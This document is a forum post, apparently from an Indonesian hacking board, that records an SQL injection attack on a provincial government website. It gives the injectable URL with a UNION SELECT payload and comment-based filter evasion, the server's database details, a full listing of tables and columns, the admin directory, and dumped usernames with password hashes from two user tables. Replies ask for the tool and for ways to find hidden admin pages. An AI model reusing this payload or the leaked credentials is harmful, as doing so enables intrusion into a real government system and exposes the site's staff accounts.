Admin dir: http://www.sulut.go.id/admin/
Dump:
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing all databases current user has access too!
[+] Number of Databases: 2
[0]sulut
[1]test
[-] [16:48:42]
[-] Total URL Requests 4
[-] Done
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:58
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing Tables & Columns from database "sulut"
[+] Number of Tables: 81
[Database]: sulut
[Table: Columns]
[0]arsip: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[1]artikel: berita_id,tanggal,judul,isi,foto,penulis,alamat,email,klik
[2]bapedal: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[3]berita: berita_id,tanggal,judul,topik,isi,penulis,klik,ses
[4]bkkbn: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[5]cuaca: cuaca_id,imageCuaca,iklim,kelembaman
[6]data_instansi: dataID,kodeInstansi,tahunData,judulData,isiData
[7]diklat: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[8]diknas: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[9]dipenda: utamaID,kodeUtama,nomorUtama,judulUtama,uraianUtama,gambarUtama
[10]direktori: direktoriID,kodeInfo,juduldirektori,namadirektori,urldirektori
[11]diskom: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[12]distamben: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[13]dprd: dprdID,kodeJabatan,nomorJabatan,nama,namaJabatan,asaldprd
[14]dy_agenda: id,thn,bln,tgl,nama,keterangan
[15]dy_config: Name,Value
[16]dy_content: id,name,vname,description,text,date,auth,publish,access,position,ordered
[17]dy_content_c: id,name,vname,description,text,date,auth,publish,access,ordered,content_id
[18]dy_gbook: id,name,email,location,url,comments,date,status,iplog
[19]dy_links: name,url
[20]dy_module: Name,VName,Vimg,Access,status,staff,ordered
[21]dy_photo: id,photo,width,height,size,deskripsi,auth,date,fname,kategori,STATUS
[22]dy_photo_category: id,cname,name,access,status,type
[23]dy_photo_comment: id,pid,date,status,name,address,email,url,text,vemail,vurl,iplog
[24]dy_section: Name,VName,Vimg,Access,status,staff,ordered
[25]dy_sms: id,name,email,lokasi,msg,date,aktif
[26]dy_sosok: id,date,nama,text,photo,auth,aktif,hit
[27]dy_user: id,username,fullname,password,mode,modeDesc,telp,mobile,lastlogin,ustaff,email,status,ukey
[28]dy_user_pm: id,sender,to_user,subject,text,status,date
[29]dy_usermode: Mode,modeDesc
[30]dy_userstaff: id,Name
[31]fotosulut: pictureID,kodePicture,judulPicture,linkPicture,namaPicture,uraianPicture,titlePicture,descPicture
[32]infoumum: infoumumID,priorNumber,kodeInfo,judulInfoumum,titleInfoumum,namaInfoumum,alamatInfoumum,telponInfoumum,faxInfoumum,mailInfoumum,urlInfoumum
[33]infrastruktur: infraID,kodeInfra,judulInfra,uraianInfra,titleInfra,descInfra,gambarInfra
[34]instansi: instansiID,nomorID,kodeInstansi,namaPejabat,nipInstansi,pktInstansi,lahirInstansi,fotoPejabat,alamatInstansi,telponInstansi,faxInstansi,mailInstansi,urlInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[35]jajak: id,topik,pil1,pil2,pil3,vote1,vote2,vote3
[36]kehutanan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[37]kesbang: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[38]kesehatan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[39]kesos: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[40]koperasi: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[41]kurs: kursID,nomorKurs,uraianKurs,jualKurs,beliKurs
[42]menu_direktori: infoID,kode,uraianInfo
[43]menu_dprd: dprdID,kodeDprd,uraianDprd
[44]menu_fraksi: dprdID,kodeDprd,uraianDprd
[45]menu_galeri: galeriID,uraianGaleri
[46]menu_infoumum: infoID,kode,uraianInfo
[47]menu_infrastruktur: infraID,kodeInfra,uraianInfra
[48]menu_instansi: instansiID,kodeInstansi,uraianInstansi
[49]menu_pejabat: pejabatID,kodePejabat,uraianPejabat
[50]menu_pemerintahan: pemerintahanID,kodeMenu,uraianPemerintahan
[51]menu_perisinan: infoID,kode,uraianInfo
[52]menu_riwayat: riwayatID,kodeRiwayat,uraianRiwayat
[53]menu_sekilas: sekilasID,kodeSekilas,uraianSekilas
[54]menu_sektor: sektorID,kodeSektor,uraianSektor
[55]menu_tahun: infoID,kode,uraianInfo
[56]nama_instansi: namaID,kodeInstansi,kodenama,namaInstansi,alamatInstansi,telponInstansi,urlInstansi
[57]objekwisata: wisataID,kodeWisata,judulWisata,uraianWisata,gambarWisata,titleWisata,descWisata
[58]pariwisata: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[59]pejabat: pejabatID,kodeUnit,namaPejabat,nipPejabat,pktPejabat,lahirPejabat,fotoPejabat,urlPejabat
[60]peluang_investasi: investasiID,judulInvestasi,isiInvestasi,sumberInvestasi,klikInvestasi,titleInvestasi,descInvestasi
[61]pemerintahan: pemerintahanID,kodePemerintahan,judulPemerintahan,uraianPemerintahan,titlePemerintahan,descPemerintahan
[62]penduduk: pendudukID,tahunPenduduk,kabkotaPenduduk,lakiPenduduk,perempuanPenduduk,coba
[63]peraturan: perisinanID,perisinanIDkode,perisinanNomor,tahun,perisinanTopik,perisinanFile,perisinanContent
[64]perhubungan: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[65]pmd: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[66]potensi_investasi: potensiID,kodeSektor,komoditasPotensi,kapasitasPotensi,investasiPotensi,lokasiPotensi,ketPotensi
[67]potensikecamatan: potensiID,kdKabupaten,kdKecamatan,judulPotensi,uraianPotensi
[68]praskim: utamaID,kodeUtama,judulUtama,uraianUtama,gambarUtama
[69]program: program_id,judul,isi
[70]riwayat: riwayatID,kodeUnit,kodeRiwayat,tahunRiwayat,uraianRiwayat
[71]sekilas: sekilasID,judulSekilas,uraianSekilas,titleSekilas,descSekilas,foto
[72]statistik: statistikID,sektorStatistik,tahunStatistik,judulStatistik,fileStatistik
[73]sumber: sumber_id,kode,topik
[74]test: field1,field2,field3,field4,field5
[75]topik: topikID,kriteria,namaTopik
[76]tupoksi: tupoksiID,kodeInstansi,visiInstansi,misiInstansi,tupokInstansi,fungsiInstansi
[77]user_admin: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc
[78]user_group: userGroupID,userGroupName,userGroupDesc
[79]user_sulut: userID,userGroupID,userUserName,userPassword,userName,userEmail,userDesc
[-] [17:13:55]
[-] Total URL Requests 458
[-] Done
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:16:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 4
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:17:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "dy_user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 4
[0] admin:7d4aff1e876d0d969e2dd3083c344faa
[1] vendhy:610b8251af8ae12ad9d1a4508b243fa6
[2] psit02:82027888c5bb8fc395411cb6804a066c
[3] psit07:e1c91b6b6117f93c1c8734a22acffc2d
[-] [17:17:21]
[-] Total URL Requests 6
[-] Done
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 17:19:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Dumping data from database "sulut" Table "user_admin"
[+] Column(s) ['userUserName', 'userPassword']
[+] Number of Rows: 2
[0] glory:4f35ffc581dfecea4db9e25f27d17cd9
[1] kpsit:f8aa5e424bf3e7c8e3e400c906b10465
[-] [17:20:08]
[-] Total URL Requests 4
[-] Done
bagus mas. :D
mas viperfx07 pake tools apa?
boleh aku minta? sekalian cara pake nya ^_*
ini email ku whiza@telkom.net
thx b4
salam
bro. kalau mau mencari page administrator yang di sembunyikan gimana ya?
thanks before